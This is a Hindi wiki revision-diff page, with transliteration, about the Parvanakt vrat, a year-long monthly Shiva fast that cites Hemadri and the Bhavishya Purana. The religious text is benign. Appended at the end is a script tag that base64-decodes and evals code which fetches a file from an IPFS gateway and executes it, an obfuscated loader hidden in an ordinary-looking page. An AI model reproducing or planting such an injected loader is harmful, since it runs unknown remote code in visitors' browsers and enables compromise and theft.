Difference between revisions of "पर्वनक्त व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*एक वर्ष तक प्रत्येक मास की 15वीं तिथि पर नक्त विधि का प्रयोग किया जाता है।
 
*एक वर्ष तक प्रत्येक मास की 15वीं तिथि पर नक्त विधि का प्रयोग किया जाता है।
 
*प्रकीर्णक व्रत होता है।
 
*प्रकीर्णक व्रत होता है।
Line 6: Line 6:
 
*इस व्रत से शिवलोक की प्राप्ति होती है, पुनः मनुष्य योनि में नहीं आना पड़ता।<ref>हेमाद्रि (व्रतखण्ड 2, पृ्ष्ठ 905-06, [[भविष्य पुराण]] से उद्धरण)।</ref>
 
*इस व्रत से शिवलोक की प्राप्ति होती है, पुनः मनुष्य योनि में नहीं आना पड़ता।<ref>हेमाद्रि (व्रतखण्ड 2, पृ्ष्ठ 905-06, [[भविष्य पुराण]] से उद्धरण)।</ref>
 
 
 
 
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 09:50, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ek varsh tak pratyek mas ki 15vian tithi par nakt vidhi ka prayog kiya jata hai.
  • prakirnak vrat hota hai.
  • isamean devata shiv ki pooja ki jati hai.
  • varsh ke ant mean shiv bhaktoan ko 'svami prasann hoan' ke sath bhojan dena hota hai.
  • is vrat se shivalok ki prapti hoti hai, punah manushy yoni mean nahian ana p data.[1]

 

tika tippani aur sandarbh

  1. hemadri (vratakhand 2, prihshth 905-06, bhavishy puran se uddharan).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>